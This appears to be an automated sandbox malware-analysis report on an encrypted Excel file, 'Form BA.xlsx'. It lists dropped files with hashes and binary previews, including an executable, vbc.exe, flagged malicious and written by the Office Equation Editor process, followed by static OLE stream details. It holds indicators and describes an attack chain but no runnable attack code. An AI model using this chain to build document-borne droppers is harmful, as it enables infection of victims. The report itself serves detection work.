                                                                                                                                                  SSDEEP:1536:S30U+TLdCuTO/G6VepVUxKHu9CongJvJsg:vCTbVKVzHu9ConWvJF
                                                                                                                                                  MD5:722C1BE1697CFCEAE7BDEFB463265578
                                                                                                                                                  SHA1:7D300A2BAB951B475477FAA308E4160C67AD93A9
                                                                                                                                                  SHA-256:2EE4908690748F50B261A796E6932FBCA10A79D83C316A9CEE92726CA4453DAE
                                                                                                                                                  SHA-512:2F38E0581397025674FA40B20E73B32D26F43851BE9A8DFA0B1655795CDC476A5171249D1D8D383693775ED9F132FA6BB56D92A8949191738AF05DA053C4E561
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: ......JFIF.....`.`......Exif..MM.*.......;.........J.i.........R.......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AB839B70.jpeg
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):85020
                                                                                                                                                  Entropy (8bit):7.2472785111025875
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
                                                                                                                                                  MD5:738BDB90A9D8929A5FB2D06775F3336F
                                                                                                                                                  SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
                                                                                                                                                  SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
                                                                                                                                                  SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B52CFCE6.emf
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):648132
                                                                                                                                                  Entropy (8bit):2.812369690502041
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3072:u34UL0tS6WB0JOqFB5AEA7rgXuzqn8nG/qc+5:g4UcLe0JOcXuunhqcS
                                                                                                                                                  MD5:2051FB74D1E67A37780B94F236AFB26D
                                                                                                                                                  SHA1:8BA9450C0530390D27E7FDCEC790D3897730DFA4
                                                                                                                                                  SHA-256:643983836D160B51928239762C729C2B9D374A85B803387CE24B3C02F3C55B04
                                                                                                                                                  SHA-512:C1C3FF7400EAD8F1B0CD7ED7C2378974ABE971F7FA8943EA583ED9FF9E4341EE9C102E6FA9C1D9C784C26DC716944638B83781BE3E60E0A5EF8698B1FD9BA3DA
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: ....l...........................m>...!.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................z$.....O.-z.z.@P.%.....O...O.....0.O...O..N5P0.O.(.O.......O...O..N5P0.O.(.O. ....y.z(.O.0.O. ............z.z............O...........................%...X...%...7...................{$..................C.a.l.i.b.r.i.............O.X...(.O.\.O............vdv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@............L.......................P... ...6...F...$.......EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C1FF01E4.jpeg
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):85020
                                                                                                                                                  Entropy (8bit):7.2472785111025875
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
                                                                                                                                                  MD5:738BDB90A9D8929A5FB2D06775F3336F
                                                                                                                                                  SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
                                                                                                                                                  SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
                                                                                                                                                  SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D2827BAF.emf
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):7608
                                                                                                                                                  Entropy (8bit):5.084398854528001
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:+SFvbLSR5gs3iwiMO10VCVU7ckQadVDYM/PVfmhDqpH:5Fvw+sW31RGtdVDYM3VfmkpH
                                                                                                                                                  MD5:47A28CB161396FA7C67E39A74619C8CD
                                                                                                                                                  SHA1:B65196123279EE71D31E2C3D23B98937096F08F1
                                                                                                                                                  SHA-256:BB9E78C91679C8FCC51849CCED0EE7E7CE680E9249A2B074A681AAC1D7379DDC
                                                                                                                                                  SHA-512:99882C47315A1209104BE1C0CE49391B9AD9A04C8480297FF6E30C1D8ECEBC4EF3F3557869E685D5CA37879CA96B4F398514367AE73777AE3433C19505352797
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: ....l...,...........<................... EMF................................8...X....................?..................................C...R...p...................................S.e.g.o.e. .U.I..................................................._.6.).X...x.#.d.......................@......p....\......................p.........6Pv...p....`..p.`_.$y.v.]v...8............v..v.$.......d.......$....^.p.....^.px[v..]v.Prf...8.-........<.v................<.>v.Z.v....X.bS.....`_........................vdv......%...................................r...................'...........(...(..................?...........?................l...4...........(...(...(...(...(..... .............................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F1ED9AE7.png
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:PNG image data, 816 x 552, 8-bit/color RGB, non-interlaced
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):94963
                                                                                                                                                  Entropy (8bit):7.9700481154985985
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:1536:U75cCbvD0PYFuxgYx30CS9ITdjq/DnjKqLqA/cx8zJjCKouoRwWH/EXXXXXXXXXB:kAPVZZ+oq/3TLPcx8zJjCXaWfEXXXXXB
                                                                                                                                                  MD5:17EC925977BED2836071429D7B476809
                                                                                                                                                  SHA1:7A176027FFD13AA407EF29EA42C8DDF7F0CC5D5C
                                                                                                                                                  SHA-256:83905385F5DF8E961CE87C8C4F5E2F470CBA3198A6C1ABB0258218D932DDF2E9
                                                                                                                                                  SHA-512:3E63730BC8FFEAD4A57854FEA1F1F137F52683734B68003480030DA77379EF6347115840280B63B75D61569B2F4F307B832241E3CEC23AD27A771F7B16D199A2
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: .PNG........IHDR...0...(.....9.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....e.z...b.$..P ..^.Jd..8.........c..c..mF.&......F...[....Zk...>.g....{...U.T.S.'.O......eS`S`S`S`S`S`S`S..Q.{....._...?...g7.6.6.6.6.6.6.6......$......................!..c.?.).).).).).)..).=...+.....................}................x.....O.M.M.M.M.M.M.M..M...>....o.l.l.l.l.l..z.l@...&.................@.....C................+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1........................]............x....e..n............+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1..................?.....b..o.l.l.l.l.l.l.|`.l@...`.~S`S`S`S`S`S`S`..=.6.6.6.6.6.6.6.>0.6 ....?.).).).).).).).......................}..................l.M.M.M.M.M.M.M..L...>....o.l.l.l.l.l.l.l@.....................d.x...7.6.6.6.6.6.6.6 .s`S`S`S`S`S`S`S..S`...<...
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\mso37B6.tmp
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:PC bitmap, Windows 3.x format, 20 x 20 x 24
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1254
                                                                                                                                                  Entropy (8bit):5.835900066445133
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:qEnXJZiYfAzWGWCZGw3jW5uyPBPcemkGFM3JJJJJOm6JJJJJZEoJJJJJuRl6JJJt:znXJLA7TjGRc3M3JJJJJOm6JJJJJuoJ3
                                                                                                                                                  MD5:A3C62E516777C15BF216F12143693C61
                                                                                                                                                  SHA1:277BFA1F59B59276EF52EF39AE26D4DD3BDB285F
                                                                                                                                                  SHA-256:616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
                                                                                                                                                  SHA-512:AA2E51951CF7D51FC8E5F24D49403A9C3EE83E57E6080BF5FBDAB73D77020054B561D9B733BC60366B5E2A2F5570650052BFD5196196EFA24EF3E26247D3ADF2
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: BM........6...(..............................................}l.lXvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaL.........................................................vaL.........................................................vaL.........................................................vaL..........{..{..{..{..{..{..{..{..{..{..{..{..{..{..{...vaL..........................u........}.z.i......vaL......................x....}............]......vaL.....................{.............w........vaL.................~.............w.........vaL.........................................vaL.........................................vaL......................................................vaL......................................................vaL......................................................vaL......................................................vaL.............................................
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\mso37B7.tmp
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:PC bitmap, Windows 3.x format, 20 x 20 x 24
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1254
                                                                                                                                                  Entropy (8bit):5.835900066445133
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:qEnXJZiYfAzWGWCZGw3jW5uyPBPcemkGFM3JJJJJOm6JJJJJZEoJJJJJuRl6JJJt:znXJLA7TjGRc3M3JJJJJOm6JJJJJuoJ3
                                                                                                                                                  MD5:A3C62E516777C15BF216F12143693C61
                                                                                                                                                  SHA1:277BFA1F59B59276EF52EF39AE26D4DD3BDB285F
                                                                                                                                                  SHA-256:616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
                                                                                                                                                  SHA-512:AA2E51951CF7D51FC8E5F24D49403A9C3EE83E57E6080BF5FBDAB73D77020054B561D9B733BC60366B5E2A2F5570650052BFD5196196EFA24EF3E26247D3ADF2
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: BM........6...(..............................................}l.lXvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaL.........................................................vaL.........................................................vaL.........................................................vaL..........{..{..{..{..{..{..{..{..{..{..{..{..{..{..{...vaL..........................u........}.z.i......vaL......................x....}............]......vaL.....................{.............w........vaL.................~.............w.........vaL.........................................vaL.........................................vaL......................................................vaL......................................................vaL......................................................vaL......................................................vaL.............................................
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\mso37B8.tmp
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:PC bitmap, Windows 3.x format, 20 x 20 x 24
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1254
                                                                                                                                                  Entropy (8bit):5.835900066445133
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:qEnXJZiYfAzWGWCZGw3jW5uyPBPcemkGFM3JJJJJOm6JJJJJZEoJJJJJuRl6JJJt:znXJLA7TjGRc3M3JJJJJOm6JJJJJuoJ3
                                                                                                                                                  MD5:A3C62E516777C15BF216F12143693C61
                                                                                                                                                  SHA1:277BFA1F59B59276EF52EF39AE26D4DD3BDB285F
                                                                                                                                                  SHA-256:616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
                                                                                                                                                  SHA-512:AA2E51951CF7D51FC8E5F24D49403A9C3EE83E57E6080BF5FBDAB73D77020054B561D9B733BC60366B5E2A2F5570650052BFD5196196EFA24EF3E26247D3ADF2
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: BM........6...(..............................................}l.lXvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaL.........................................................vaL.........................................................vaL.........................................................vaL..........{..{..{..{..{..{..{..{..{..{..{..{..{..{..{...vaL..........................u........}.z.i......vaL......................x....}............]......vaL.....................{.............w........vaL.................~.............w.........vaL.........................................vaL.........................................vaL......................................................vaL......................................................vaL......................................................vaL......................................................vaL.............................................
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\msoE743.tmp
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:PC bitmap, Windows 3.x format, 20 x 20 x 24
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1254
                                                                                                                                                  Entropy (8bit):5.835900066445133
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:qEnXJZiYfAzWGWCZGw3jW5uyPBPcemkGFM3JJJJJOm6JJJJJZEoJJJJJuRl6JJJt:znXJLA7TjGRc3M3JJJJJOm6JJJJJuoJ3
                                                                                                                                                  MD5:A3C62E516777C15BF216F12143693C61
                                                                                                                                                  SHA1:277BFA1F59B59276EF52EF39AE26D4DD3BDB285F
                                                                                                                                                  SHA-256:616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
                                                                                                                                                  SHA-512:AA2E51951CF7D51FC8E5F24D49403A9C3EE83E57E6080BF5FBDAB73D77020054B561D9B733BC60366B5E2A2F5570650052BFD5196196EFA24EF3E26247D3ADF2
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: BM........6...(..............................................}l.lXvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaL.........................................................vaL.........................................................vaL.........................................................vaL..........{..{..{..{..{..{..{..{..{..{..{..{..{..{..{...vaL..........................u........}.z.i......vaL......................x....}............]......vaL.....................{.............w........vaL.................~.............w.........vaL.........................................vaL.........................................vaL......................................................vaL......................................................vaL......................................................vaL......................................................vaL.............................................
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\msoE773.tmp
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:PC bitmap, Windows 3.x format, 20 x 20 x 24
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1254
                                                                                                                                                  Entropy (8bit):5.835900066445133
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:qEnXJZiYfAzWGWCZGw3jW5uyPBPcemkGFM3JJJJJOm6JJJJJZEoJJJJJuRl6JJJt:znXJLA7TjGRc3M3JJJJJOm6JJJJJuoJ3
                                                                                                                                                  MD5:A3C62E516777C15BF216F12143693C61
                                                                                                                                                  SHA1:277BFA1F59B59276EF52EF39AE26D4DD3BDB285F
                                                                                                                                                  SHA-256:616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
                                                                                                                                                  SHA-512:AA2E51951CF7D51FC8E5F24D49403A9C3EE83E57E6080BF5FBDAB73D77020054B561D9B733BC60366B5E2A2F5570650052BFD5196196EFA24EF3E26247D3ADF2
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: BM........6...(..............................................}l.lXvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaL.........................................................vaL.........................................................vaL.........................................................vaL..........{..{..{..{..{..{..{..{..{..{..{..{..{..{..{...vaL..........................u........}.z.i......vaL......................x....}............]......vaL.....................{.............w........vaL.................~.............w.........vaL.........................................vaL.........................................vaL......................................................vaL......................................................vaL......................................................vaL......................................................vaL.............................................
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\msoE774.tmp
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:PC bitmap, Windows 3.x format, 20 x 20 x 24
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1254
                                                                                                                                                  Entropy (8bit):5.835900066445133
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:qEnXJZiYfAzWGWCZGw3jW5uyPBPcemkGFM3JJJJJOm6JJJJJZEoJJJJJuRl6JJJt:znXJLA7TjGRc3M3JJJJJOm6JJJJJuoJ3
                                                                                                                                                  MD5:A3C62E516777C15BF216F12143693C61
                                                                                                                                                  SHA1:277BFA1F59B59276EF52EF39AE26D4DD3BDB285F
                                                                                                                                                  SHA-256:616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
                                                                                                                                                  SHA-512:AA2E51951CF7D51FC8E5F24D49403A9C3EE83E57E6080BF5FBDAB73D77020054B561D9B733BC60366B5E2A2F5570650052BFD5196196EFA24EF3E26247D3ADF2
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: BM........6...(..............................................}l.lXvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaL.........................................................vaL.........................................................vaL.........................................................vaL..........{..{..{..{..{..{..{..{..{..{..{..{..{..{..{...vaL..........................u........}.z.i......vaL......................x....}............]......vaL.....................{.............w........vaL.................~.............w.........vaL.........................................vaL.........................................vaL......................................................vaL......................................................vaL......................................................vaL......................................................vaL.............................................
                                                                                                                                                  C:\Users\user\Desktop\~$Form BA.xlsx
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):330
                                                                                                                                                  Entropy (8bit):1.4377382811115937
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                                                                                                                                  MD5:96114D75E30EBD26B572C1FC83D1D02E
                                                                                                                                                  SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                                                                                                                                  SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                                                                                                                                  SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                  C:\Users\Public\vbc.exe
                                                                                                                                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):713216
                                                                                                                                                  Entropy (8bit):7.571021299706813
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:BUEnk8yfaR+DaY3bsojKdqFyirJ5Y1oDpgAwUzl3XoJPcISRqzGWl06bsyaUVKnp:KEnkZCR+ZjKYjrw1o1H73XwPcIll/bz6
                                                                                                                                                  MD5:734A568749C7879E5CA5EA2B8E082F5E
                                                                                                                                                  SHA1:27D6276E49602F3633DFDD94DE400DB53E209B51
                                                                                                                                                  SHA-256:D0F6F28C586B78DFBC7D4E6C277C20761C9DB38E0CD059807BE5252B52D10660
                                                                                                                                                  SHA-512:012E2122B51055DD011341E629890F3D7B9D3D8CE6984D62EDD287C625634C01B5FB7D220002C79D5E53EBF089FEE5C505B48FDCBE89951BEB36D0A92E9B96E0
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`..............P.................. ........@.. .......................@............@.................................|...O............................ ....................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H...........p...........L...0)...........................................0............( ...(!.........(.....o"....*.....................(#......($......(%......(&......('....*N..(....oE...((....*&..()....*.s*........s+........s,........s-........s.........*....0...........~....o/....+..*.0...........~....o0....+..*.0...........~....o1....+..*.0...........~....o2....+..*.0...........~....o3....+..*.0..<........~.....(4.....,!r...p.....(5...o6...s7............~.....+..*.0......

                                                                                                                                                  Static File Info

                                                                                                                                                  General

                                                                                                                                                  File type:CDFV2 Encrypted
                                                                                                                                                  Entropy (8bit):7.993957532893648
                                                                                                                                                  TrID:
                                                                                                                                                  • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                                                                                                                  File name:Form BA.xlsx
                                                                                                                                                  File size:1277440
                                                                                                                                                  MD5:f683a8eb2e17866a194af9b23efda095
                                                                                                                                                  SHA1:b3002f93d24336a9af003a7a3da36217a7d7b8db
                                                                                                                                                  SHA256:e6de55ef568521e22566496d9df49eb1a4cf2ea94082d8d0bcd357f41d2962ef
                                                                                                                                                  SHA512:7d61feb01d5ab561848c500232cefa553b6ef818487ef8361e13f32b00d8340425a93f518e867e449d689d1a2f3dfb4136ed9c9380c03fde7e72acf86e55716a
                                                                                                                                                  SSDEEP:24576:8eZrCoZjO0Z3LTlr6QoKZavurFhXI7EUMYcSNk5TIwrgm80Wa4+W3xBK8Gom9KvE:VZrCf0Z3d2e0urFhbpYBNk5T9q0bohBA
                                                                                                                                                  File Content Preview:........................>.......................................................................................................|.......~...............z......................................................................................................

                                                                                                                                                  File Icon

                                                                                                                                                  Icon Hash:e4e2aa8aa4b4bcb4

                                                                                                                                                  Static OLE Info

                                                                                                                                                  General

                                                                                                                                                  Document Type:OLE
                                                                                                                                                  Number of OLE Files:1

                                                                                                                                                  OLE File "Form BA.xlsx"

                                                                                                                                                  Indicators

                                                                                                                                                  Has Summary Info:False
                                                                                                                                                  Application Name:unknown
                                                                                                                                                  Encrypted Document:True
                                                                                                                                                  Contains Word Document Stream:False
                                                                                                                                                  Contains Workbook/Book Stream:False
                                                                                                                                                  Contains PowerPoint Document Stream:False
                                                                                                                                                  Contains Visio Document Stream:False
                                                                                                                                                  Contains ObjectPool Stream:
                                                                                                                                                  Flash Objects Count:
                                                                                                                                                  Contains VBA Macros:False

                                                                                                                                                  Streams

                                                                                                                                                  Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                                                                                                                                                  General
                                                                                                                                                  Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                                                                                                                                                  File Type:data
                                                                                                                                                  Stream Size:64
                                                                                                                                                  Entropy:2.73637206947
                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                  Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                                                                                                                                                  Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
                                                                                                                                                  Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                                                                                                                                                  General
                                                                                                                                                  Stream Path:\x6DataSpaces/DataSpaceMap
                                                                                                                                                  File Type:data
                                                                                                                                                  Stream Size:112
                                                                                                                                                  Entropy:2.7597816111
                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                  Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                                                                                                                                                  Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
                                                                                                                                                  Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
                                                                                                                                                  General
                                                                                                                                                  Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                                                                                                                                                  File Type:data
                                                                                                                                                  Stream Size:200
                                                                                                                                                  Entropy:3.13335930328
                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                  Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                  Data Raw:58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
                                                                                                                                                  Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                                                                                                                                                  General
                                                                                                                                                  Stream Path:\x6DataSpaces/Version
                                                                                                                                                  File Type:data
                                                                                                                                                  Stream Size:76
                                                                                                                                                  Entropy:2.79079600998
                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                  Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
